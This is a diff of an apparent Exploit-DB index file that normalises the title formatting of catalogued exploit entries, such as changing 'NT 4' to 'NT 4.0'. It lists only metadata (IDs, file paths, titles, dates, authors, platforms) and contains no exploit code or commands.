 21248,platforms/linux/local/21248.txt,"(Linux Kernel 2.4.17-8) User-Mode Linux - Memory Access Privilege Escalation",2000-08-25,"Andrew Griffiths",linux,local,0
-21258,platforms/linux/local/21258.bat,"Microsoft Windows NT 4/2000 - NTFS File Hiding",2002-01-29,"Hans Somers",linux,local,0
+21258,platforms/linux/local/21258.bat,"Microsoft Windows NT 4.0/2000 - NTFS File Hiding",2002-01-29,"Hans Somers",linux,local,0
 21259,platforms/linux/local/21259.java,"Sun Java Virtual Machine 1.2.2/1.3.1 - Segmentation Violation",2002-01-30,"Taeho Oh",linux,local,0
 21280,platforms/linux/local/21280.c,"Hanterm 3.3 - Local Buffer Overflow (1)",2002-02-07,Xpl017Elz,linux,local,0
 21281,platforms/linux/local/21281.c,"Hanterm 3.3 - Local Buffer Overflow (2)",2002-02-07,xperc,linux,local,0
@ -7664,7 +7666,7 @@ id,file,description,date,author,platform,type,port
 21331,platforms/windows/local/21331.py,"NCMedia Sound Editor Pro 7.5.1 - MRUList201202.dat File Handling Buffer Overflow",2012-09-17,"Julien Ahrens",windows,local,0
 21341,platforms/linux/local/21341.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (1)",2002-02-27,"the itch",linux,local,0
 21342,platforms/linux/local/21342.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (2)",2002-02-27,"the itch",linux,local,0
-21344,platforms/windows/local/21344.txt,"Microsoft Windows NT 4/2000 - Process Handle Local Privilege Elevation",2002-03-13,EliCZ,windows,local,0
+21344,platforms/windows/local/21344.txt,"Microsoft Windows NT 4.0/2000 - Process Handle Local Privilege Elevation",2002-03-13,EliCZ,windows,local,0
 21347,platforms/php/local/21347.php,"PHP 3.0.x/4.x - Move_Uploaded_File open_basedir Circumvention",2002-03-17,Tozz,php,local,0
 21348,platforms/linux/local/21348.txt,"Webmin 0.x - Code Input Validation",2002-03-20,prophecy,linux,local,0
 21351,platforms/windows/local/21351.pl,"WorkforceROI Xpede 4.1/7.0 - Weak Password Encryption",2002-03-22,c3rb3r,windows,local,0
@ -7721,14 +7723,14 @@ id,file,description,date,author,platform,type,port
 40429,platforms/windows/local/40429.cs,"Microsoft Windows 10 10586 (x86/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0
 21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0
 21683,platforms/linux/local/21683.c,"qmailadmin 1.0.x - Local Buffer Overflow",2002-08-06,"Thomas Cannon",linux,local,0
-21684,platforms/windows/local/21684.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (1)",2002-08-06,sectroyer,windows,local,0
+21684,platforms/windows/local/21684.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (1)",2002-08-06,sectroyer,windows,local,0
-21685,platforms/windows/local/21685.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (2)",2002-08-06,"Oliver Lavery",windows,local,0
+21685,platforms/windows/local/21685.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (2)",2002-08-06,"Oliver Lavery",windows,local,0
-21686,platforms/windows/local/21686.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (3)",2002-08-06,"Brett Moore",windows,local,0
+21686,platforms/windows/local/21686.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (3)",2002-08-06,"Brett Moore",windows,local,0
-21687,platforms/windows/local/21687.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (4)",2002-08-06,"Brett Moore",windows,local,0
+21687,platforms/windows/local/21687.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (4)",2002-08-06,"Brett Moore",windows,local,0
-21688,platforms/windows/local/21688.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (5)",2002-08-06,"Oliver Lavery",windows,local,0
+21688,platforms/windows/local/21688.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (5)",2002-08-06,"Oliver Lavery",windows,local,0
-21689,platforms/windows/local/21689.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (6)",2002-08-06,"Brett Moore",windows,local,0
+21689,platforms/windows/local/21689.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (6)",2002-08-06,"Brett Moore",windows,local,0
-21690,platforms/windows/local/21690.txt,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (7)",2002-08-06,"Ovidio Mallo",windows,local,0
+21690,platforms/windows/local/21690.txt,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (7)",2002-08-06,"Ovidio Mallo",windows,local,0
-21691,platforms/windows/local/21691.txt,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (8)",2002-08-06,anonymous,windows,local,0
+21691,platforms/windows/local/21691.txt,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (8)",2002-08-06,anonymous,windows,local,0
 21700,platforms/linux/local/21700.c,"ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (1)",2002-08-10,"Gobbles Security",linux,local,0
 21701,platforms/linux/local/21701.pl,"ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (2)",2002-08-10,"TESO Security",linux,local,0
 21713,platforms/windows/local/21713.py,"NCMedia Sound Editor Pro 7.5.1 - (SEH + DEP Bypass)",2012-10-03,b33f,windows,local,0
@ -7771,8 +7773,8 @@ id,file,description,date,author,platform,type,port
 21887,platforms/windows/local/21887.php,"PHP 5.3.4 Win Com Module - Com_sink Exploit",2012-10-11,fb1h2s,windows,local,0
 21892,platforms/windows/local/21892.txt,"FileBound 6.2 - Privilege Escalation",2012-10-11,"Nathaniel Carew",windows,local,0
 21904,platforms/aix/local/21904.pl,"IBM AIX 4.3.x/5.1 - ERRPT Local Buffer Overflow",2003-04-16,watercloud,aix,local,0
-21922,platforms/windows/local/21922.c,"Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (1)",2002-10-09,Serus,windows,local,0
+21922,platforms/windows/local/21922.c,"Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (1)",2002-10-09,Serus,windows,local,0
-21923,platforms/windows/local/21923.c,"Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (2)",2002-10-09,Serus,windows,local,0
+21923,platforms/windows/local/21923.c,"Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (2)",2002-10-09,Serus,windows,local,0
 21980,platforms/linux/local/21980.c,"Abuse 2.0 - Local Buffer Overflow",2002-11-01,Girish,linux,local,0
 21988,platforms/windows/local/21988.pl,"Huawei Technologies Internet Mobile - Unicode SEH Exploit",2012-10-15,Dark-Puzzle,windows,local,0
 21994,platforms/windows/local/21994.rb,"Microsoft Windows - Escalate Service Permissions Privilege Escalation (Metasploit)",2012-10-16,Metasploit,windows,local,0
@ -7813,7 +7815,7 @@ id,file,description,date,author,platform,type,port
 22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow",2002-03-02,"Knud Erik Hojgaard",unix,local,0
 22340,platforms/linux/local/22340.txt,"MySQL 3.23.x - 'mysqld' Privilege Escalation",2003-03-08,bugsman@libero.it,linux,local,0
 22344,platforms/linux/local/22344.txt,"Man Program 1.5 - Unsafe Return Value Command Execution",2003-03-11,"Jack Lloyd",linux,local,0
-22354,platforms/windows/local/22354.c,"Microsoft Windows Server 2000 - Help Facility .CNT File :Link Buffer Overflow",2003-03-09,s0h,windows,local,0
+22354,platforms/windows/local/22354.c,"Microsoft Windows Server 2000 - Help Facility '.CNT' File :Link Buffer Overflow",2003-03-09,s0h,windows,local,0
 22362,platforms/linux/local/22362.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (1)",2003-03-17,anszom@v-lo.krakow.pl,linux,local,0
 22363,platforms/linux/local/22363.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (2)",2003-04-10,"Wojciech Purczynski",linux,local,0
 22376,platforms/linux/local/22376.txt,"GNOME Eye Of Gnome 1.0.x/1.1.x/2.2 - Format String",2003-03-28,"Core Security",linux,local,0
@ -7978,7 +7980,7 @@ id,file,description,date,author,platform,type,port
 23910,platforms/windows/local/23910.txt,"F-Secure BackWeb 6.31 - Privilege Escalation",2004-04-06,"Ian Vitek",windows,local,0
 23921,platforms/windows/local/23921.c,"Centrinity FirstClass Desktop Client 7.1 - Local Buffer Overflow",2004-04-07,I2S-LaB,windows,local,0
 40400,platforms/windows/local/40400.txt,"SolarWinds Kiwi CatTools 3.11.0 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",windows,local,0
-23989,platforms/windows/local/23989.c,"Microsoft Windows NT 4/2000 - Local Descriptor Table Privilege Escalation (MS04-011)",2004-04-18,mslug@safechina.net,windows,local,0
+23989,platforms/windows/local/23989.c,"Microsoft Windows NT 4.0/2000 - Local Descriptor Table Privilege Escalation (MS04-011)",2004-04-18,mslug@safechina.net,windows,local,0
 23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - '.jpeg' Exploit",2013-01-09,"Debasish Mandal",windows,local,0
 24014,platforms/windows/local/24014.bat,"Symantec Norton AntiVirus 2002 - Nested File Manual Scan Bypass",2004-04-17,"Bipin Gautam",windows,local,0
 24015,platforms/bsd/local/24015.c,"BSD-Games 2.x - Mille Local Save Game File Name Buffer Overrun",2004-04-17,N4rK07IX,bsd,local,0
@ -7997,7 +7999,7 @@ id,file,description,date,author,platform,type,port
 24207,platforms/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Exploit",2013-01-18,"Jon Bailey",windows,local,0
 24210,platforms/hp-ux/local/24210.pl,"HP-UX 7-11 - Local X Font Server Buffer Overflow",2003-03-10,watercloud,hp-ux,local,0
 24258,platforms/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 - Privilege Escalation",2013-01-20,LiquidWorm,windows,local,0
-24277,platforms/windows/local/24277.c,"Microsoft Windows NT 4/2000 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)",2004-07-16,bkbll,windows,local,0
+24277,platforms/windows/local/24277.c,"Microsoft Windows NT 4.0/2000 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)",2004-07-16,bkbll,windows,local,0
 24278,platforms/linux/local/24278.sh,"IM-Switch - Insecure Temporary File Handling Symbolic Link",2004-07-13,"SEKINE Tatsuo",linux,local,0
 24293,platforms/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon Valle",sco,local,0
 24335,platforms/unix/local/24335.txt,"Oracle9i Database - Default Library Directory Privilege Escalation",2004-07-30,"Juan Manuel Pascual EscribÃ¡",unix,local,0
@ -8566,7 +8568,7 @@ id,file,description,date,author,platform,type,port
 38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0
 40975,platforms/android/local/40975.rb,"Google Android - get_user/put_user Exploit (Metasploit)",2016-12-29,Metasploit,android,local,0
 38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite (SEH) Buffer Overflow",2015-09-15,Un_N0n,windows,local,0
-38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
+38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 (Build 10130) - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
 38199,platforms/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)",2015-09-15,"Google Security Research",windows,local,0
 38200,platforms/windows/local/38200.txt,"Microsoft Windows Task Scheduler - DeleteExpiredTaskAfter File Deletion Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
 38201,platforms/windows/local/38201.txt,"Microsoft Windows - CreateObjectTask TileUserBroker Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
@ -8833,7 +8835,7 @@ id,file,description,date,author,platform,type,port
 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
 40788,platforms/linux/local/40788.txt,"Palo Alto Networks PanOS root_trace - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
-40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS root_reboot - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
+40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS - root_reboot Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
 40807,platforms/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",windows,local,0
 40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0
 40811,platforms/lin_x86-64/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,lin_x86-64,local,0
@ -9480,7 +9482,7 @@ id,file,description,date,author,platform,type,port
 2933,platforms/linux/remote/2933.c,"OpenLDAP 2.4.3 - (KBIND) Remote Buffer Overflow",2006-12-15,"Solar Eclipse",linux,remote,389
 2936,platforms/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 - 'ld.so.preload' Remote Code Execution",2006-12-15,kingcope,linux,remote,21
 2951,platforms/multiple/remote/2951.sql,"Oracle 9i / 10g (extproc) - Local / Remote Command Execution",2006-12-19,"Marco Ivaldi",multiple,remote,0
-2959,platforms/linux/remote/2959.sql,"Oracle 9i / 10g - File System Access via utl_file Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0
+2959,platforms/linux/remote/2959.sql,"Oracle 9i / 10g - 'utl_file' File System Access Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0
 2974,platforms/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Traversal",2006-12-21,str0ke,windows,remote,0
 3021,platforms/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution (2)",2003-10-15,"Solar Eclipse",linux,remote,21
 3022,platforms/windows/remote/3022.txt,"Microsoft Windows - ASN.1 Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445
@ -10384,7 +10386,7 @@ id,file,description,date,author,platform,type,port
 11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Buffer Overflow (Metasploit)",2010-03-15,blake,windows,remote,0
 11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll' OpenFile() Remote Overflow",2010-03-15,mr_me,windows,remote,0
 11765,platforms/windows/remote/11765.txt,"ArGoSoft FTP Server .NET 1.0.2.1 - Directory Traversal",2010-03-15,dmnt,windows,remote,21
-11817,platforms/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution via Cross Application Scripting",2010-03-20,emgent,multiple,remote,0
+11817,platforms/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution (via Cross Application Scripting)",2010-03-20,emgent,multiple,remote,0
 11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)",2010-03-20,corelanc0d3r,windows,remote,0
 11822,platforms/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence Managnmnet Hardware[MIPS] 2 - Improper Authentication",2010-03-20,fb1h2s,hardware,remote,0
 11856,platforms/multiple/remote/11856.txt,"uhttp Server 0.1.0-alpha - Directory Traversal",2010-03-23,"Salvatore Fresta",multiple,remote,0
@ -10595,7 +10597,7 @@ id,file,description,date,author,platform,type,port
 15861,platforms/windows/remote/15861.txt,"httpdasm 0.92 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0
 15862,platforms/windows/remote/15862.txt,"quickphp Web server 1.9.1 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0
 15866,platforms/windows/remote/15866.html,"Chilkat Software FTP2 - ActiveX Component Remote Code Execution",2010-12-30,rgod,windows,remote,0
-15868,platforms/windows/remote/15868.pl,"QuickPHP Web Server Arbitrary - 'src .php' File Download",2010-12-30,"Yakir Wizman",windows,remote,0
+15868,platforms/windows/remote/15868.pl,"QuickPHP Web Server - Arbitrary '.php' File Download",2010-12-30,"Yakir Wizman",windows,remote,0
 15869,platforms/windows/remote/15869.txt,"CA ARCserve D2D r15 - Web Service Servlet Code Execution",2010-12-30,rgod,windows,remote,0
 15885,platforms/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,windows,remote,0
 18245,platforms/multiple/remote/18245.py,"Splunk - Remote Command Execution",2011-12-15,"Gary O'Leary-Steele",multiple,remote,0
@ -10603,7 +10605,7 @@ id,file,description,date,author,platform,type,port
 15957,platforms/windows/remote/15957.py,"KingView 6.5.3 - SCADA HMI Heap Overflow (PoC)",2011-01-09,"Dillon Beresford",windows,remote,0
 15937,platforms/multiple/remote/15937.pl,"NetSupport Manager Agent - Remote Buffer Overflow (1)",2011-01-08,ikki,multiple,remote,0
 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0
-15963,platforms/windows/remote/15963.rb,"Microsoft Windows Common Control Library (Comctl32) - Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0
+15963,platforms/windows/remote/15963.rb,"Microsoft Windows - Common Control Library (Comctl32) Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0
 15984,platforms/windows/remote/15984.html,"Microsoft Data Access Components - Exploit (MS11-002)",2011-01-12,"Peter Vreugdenhil",windows,remote,0
 16014,platforms/windows/remote/16014.html,"Novell iPrint 5.52 - ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)",2011-01-19,Dr_IDE,windows,remote,0
 16036,platforms/windows/remote/16036.rb,"Golden FTP Server 4.70 - PASS Command Buffer Overflow",2011-01-23,"cd1zz and iglesiasgg",windows,remote,0
@ -11582,7 +11584,7 @@ id,file,description,date,author,platform,type,port
 19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - snprintf Exploit",1999-09-17,"Tymm Twillman",linux,remote,0
 19507,platforms/solaris/remote/19507.txt,"Solaris 7.0 - Recursive mutex_enter Panic",1999-09-23,"David Brumley",solaris,remote,0
 19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
-19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/NT 4) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
+19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/NT 4.0) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
 19520,platforms/bsd/remote/19520.txt,"BSD TelnetD - Remote Command Execution (2)",2012-07-01,kingcope,bsd,remote,0
 19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 - hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
 19522,platforms/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth and S. Krahmer",linux,remote,0
@ -11636,7 +11638,7 @@ id,file,description,date,author,platform,type,port
 19625,platforms/windows/remote/19625.py,"ALLMediaServer 0.8 - Overflow (SEH)",2012-07-06,"motaz reda",windows,remote,888
 19632,platforms/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink WebServer - Retrieve Administrator Password",1999-11-17,"Dennis W. Mattison",hardware,remote,0
 19634,platforms/linux/remote/19634.c,"ETL Delegate 5.9.x / 6.0.x - Buffer Overflow",1999-11-13,scut,linux,remote,0
-19637,platforms/windows/remote/19637.txt,"Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4) - XML HTTP Redirect",1999-11-22,"Georgi Guninksi",windows,remote,0
+19637,platforms/windows/remote/19637.txt,"Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4.0) - XML HTTP Redirect",1999-11-22,"Georgi Guninksi",windows,remote,0
 19644,platforms/multiple/remote/19644.txt,"symantec mail-gear 1.0 - Directory Traversal",1999-11-29,"Ussr Labs",multiple,remote,0
 19645,platforms/unix/remote/19645.c,"Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (1)",1999-11-30,Mixter,unix,remote,0
 19646,platforms/unix/remote/19646.pl,"Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (2)",1999-11-30,"Synnergy Networks",unix,remote,0
@ -11812,7 +11814,7 @@ id,file,description,date,author,platform,type,port
 20103,platforms/windows/remote/20103.txt,"AnalogX SimpleServer:WWW 1.0.6 - Directory Traversal",2000-07-26,"Foundstone Inc.",windows,remote,0
 20104,platforms/multiple/remote/20104.txt,"Roxen WebServer 2.0.x - '%00' Request File/Directory Disclosure",2000-07-21,zorgon,multiple,remote,0
 20105,platforms/linux/remote/20105.txt,"Conectiva 4.x/5.x / RedHat 6.x - pam_console Remote User",2000-07-27,bkw1a,linux,remote,0
-20106,platforms/windows/remote/20106.cpp,"Microsoft Windows NT 4/2000 - NetBIOS Name Conflict",2000-08-01,"Sir Dystic",windows,remote,0
+20106,platforms/windows/remote/20106.cpp,"Microsoft Windows NT 4.0/2000 - NetBIOS Name Conflict",2000-08-01,"Sir Dystic",windows,remote,0
 20112,platforms/windows/remote/20112.rb,"Cisco Linksys PlayerPT - ActiveX Control Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,remote,0
 20113,platforms/linux/remote/20113.rb,"Symantec Web Gateway 5.0.2.18 - pbcontrol.php Command Injection (Metasploit)",2012-07-27,Metasploit,linux,remote,0
 20301,platforms/windows/remote/20301.php,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (4)",2000-10-17,BoloTron,windows,remote,0
@ -11836,7 +11838,7 @@ id,file,description,date,author,platform,type,port
 20156,platforms/cgi/remote/20156.txt,"netwin netauth 4.2 - Directory Traversal",2000-08-17,"Marc Maiffret",cgi,remote,0
 20157,platforms/linux/remote/20157.c,"UMN Gopherd 2.x - Halidate Function Buffer Overflow",2000-08-20,"Chris Sharp",linux,remote,0
 20159,platforms/linux/remote/20159.c,"Darxite 0.4 - Login Buffer Overflow",2000-08-22,Scrippie,linux,remote,0
-20161,platforms/linux/remote/20161.txt,"X-Chat 1.2/1.3/1.4/1.5 - Command Execution Via URLs",2000-08-17,"zenith parsec",linux,remote,0
+20161,platforms/linux/remote/20161.txt,"X-Chat 1.2/1.3/1.4/1.5 - Command Execution via URLs",2000-08-17,"zenith parsec",linux,remote,0
 20163,platforms/unix/remote/20163.c,"WorldView 6.5/Wnn4 4.2 - Asian Language Server Remote Buffer Overflow",2000-03-08,UNYUN,unix,remote,0
 20164,platforms/cgi/remote/20164.pl,"CGI Script Center Account Manager 1.0 LITE / PRO - Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0
 20165,platforms/cgi/remote/20165.html,"CGI Script Center Account Manager 1.0 LITE / PRO - Administrative Password Alteration (2)",2000-08-23,n30,cgi,remote,0
@ -12389,7 +12391,7 @@ id,file,description,date,author,platform,type,port
 21475,platforms/windows/remote/21475.txt,"LocalWEB2000 2.1.0 Standard - File Disclosure",2002-05-24,"Tamer Sahin",windows,remote,0
 21483,platforms/windows/remote/21483.html,"Opera 6.0.1/6.0.2 - Arbitrary File Disclosure",2002-05-27,"GreyMagic Software",windows,remote,0
 21484,platforms/windows/remote/21484.c,"Yahoo! Messenger 5.0 - Call Center Buffer Overflow",2002-05-27,bob,windows,remote,0
-21485,platforms/windows/remote/21485.txt,"Microsoft Windows 95/98/2000/NT4 - WinHlp Item Buffer Overflow",2002-05-27,"Next Generation Security",windows,remote,0
+21485,platforms/windows/remote/21485.txt,"Microsoft Windows 95/98/2000/NT 4.0 - WinHlp Item Buffer Overflow",2002-05-27,"Next Generation Security",windows,remote,0
 21488,platforms/novell/remote/21488.txt,"Netscape Enterprise Web Server for Netware 4/5 5.0 - Information Disclosure",2002-05-29,Procheckup,novell,remote,0
 21490,platforms/multiple/remote/21490.txt,"Apache Tomcat 3.2.3/3.2.4 - Source.jsp Malformed Request Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0
 21491,platforms/multiple/remote/21491.txt,"Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure",2002-05-29,"Richard Brain",multiple,remote,0
@ -12541,7 +12543,7 @@ id,file,description,date,author,platform,type,port
 21888,platforms/windows/remote/21888.rb,"KeyHelp - ActiveX LaunchTriPane Remote Code Execution (Metasploit)",2012-10-11,Metasploit,windows,remote,0
 21897,platforms/windows/remote/21897.txt,"SurfControl SuperScout WebFilter for Windows 2000 - File Disclosure",2002-10-02,"Matt Moore",windows,remote,0
 21898,platforms/windows/remote/21898.txt,"SurfControl SuperScout WebFilter for Windows 2000 - SQL Injection",2002-10-02,"Matt Moore",windows,remote,0
-21902,platforms/windows/remote/21902.c,"Microsoft Windows XP/2000/NT 4 - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0
+21902,platforms/windows/remote/21902.c,"Microsoft Windows XP/2000/NT 4.0 - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0
 21910,platforms/windows/remote/21910.txt,"Microsoft IIS 5.0 - IDC Extension Cross-Site Scripting",2002-10-05,Roberto,windows,remote,0
 21913,platforms/windows/remote/21913.txt,"Citrix Published Applications - Information Disclosure",2002-10-07,wire,windows,remote,0
 21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 - Trojan Horse",2002-10-08,netmask,unix,remote,0
@ -12629,7 +12631,7 @@ id,file,description,date,author,platform,type,port
 22184,platforms/windows/remote/22184.pl,"GlobalScape CuteFTP 5.0 - LIST Response Buffer Overflow",2003-03-26,snooq,windows,remote,0
 22185,platforms/windows/remote/22185.txt,"Sambar Server 5.x - results.stm Cross-Site Scripting",2003-01-20,galiarept,windows,remote,0
 22187,platforms/linux/remote/22187.txt,"CVS 1.11.x - Directory Request Double-Free Heap Corruption",2003-01-20,"Stefan Esser",linux,remote,0
-22194,platforms/windows/remote/22194.txt,"Microsoft Windows XP/2000/NT 4 - Locator Service Buffer Overflow",2003-01-22,"David Litchfield",windows,remote,0
+22194,platforms/windows/remote/22194.txt,"Microsoft Windows XP/2000/NT 4.0 - Locator Service Buffer Overflow",2003-01-22,"David Litchfield",windows,remote,0
 22200,platforms/multiple/remote/22200.txt,"SyGate 5.0 - Insecure UDP Source Port Firewall Bypass Weak Default Configuration",2003-01-24,"David FernÃ¡ndez",multiple,remote,0
 22201,platforms/multiple/remote/22201.txt,"List Site Pro 2.0 - User Database Delimiter Injection",2003-01-24,Statix,multiple,remote,0
 22205,platforms/linux/remote/22205.txt,"Apache Tomcat 3.x - Null Byte Directory/File Disclosure",2003-01-26,"Jouko PynnÃ¶nen",linux,remote,0
@ -12642,7 +12644,7 @@ id,file,description,date,author,platform,type,port
 22229,platforms/windows/remote/22229.pl,"Celestial Software AbsoluteTelnet 2.0/2.11 - Title Bar Buffer Overflow",2003-02-06,"Knud Erik Hojgaard",windows,remote,0
 22236,platforms/hardware/remote/22236.txt,"Netgear FM114P Wireless Firewall - File Disclosure",2003-02-10,stickler,hardware,remote,0
 22244,platforms/hardware/remote/22244.txt,"Ericsson HM220dp DSL Modem - World Accessible Web Administration Interface",2003-02-11,"Davide Del Vecchio",hardware,remote,0
-22251,platforms/multiple/remote/22251.sh,"AIX 3.x/4.x / Windows 95/98/2000/NT 4 / SunOS 5 gethostbyname() - Buffer Overflow",2006-09-28,RoMaNSoFt,multiple,remote,0
+22251,platforms/multiple/remote/22251.sh,"AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 gethostbyname() - Buffer Overflow",2006-09-28,RoMaNSoFt,multiple,remote,0
 22264,platforms/linux/remote/22264.txt,"OpenSSL 0.9.x - CBC Error Information Leakage",2003-02-19,"Martin Vuagnoux",linux,remote,0
 22269,platforms/windows/remote/22269.txt,"Sage 1.0 Beta 3 - Content Management System Full Path Disclosure",2003-02-20,euronymous,windows,remote,0
 22270,platforms/windows/remote/22270.txt,"Sage 1.0 Beta 3 - Content Management System Cross-Site Scripting",2003-02-20,euronymous,windows,remote,0
@ -12676,10 +12678,10 @@ id,file,description,date,author,platform,type,port
 22355,platforms/cgi/remote/22355.txt,"Thunderstone TEXIS 3.0 - 'texis.exe' Information Disclosure",2003-03-14,sir.mordred@hushmail.com,cgi,remote,0
 22356,platforms/unix/remote/22356.c,"Samba SMB 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow",2003-03-15,flatline,unix,remote,0
 22361,platforms/linux/remote/22361.cpp,"Qpopper 3/4 - 'Username' Information Disclosure",2003-03-11,plasmahh,linux,remote,0
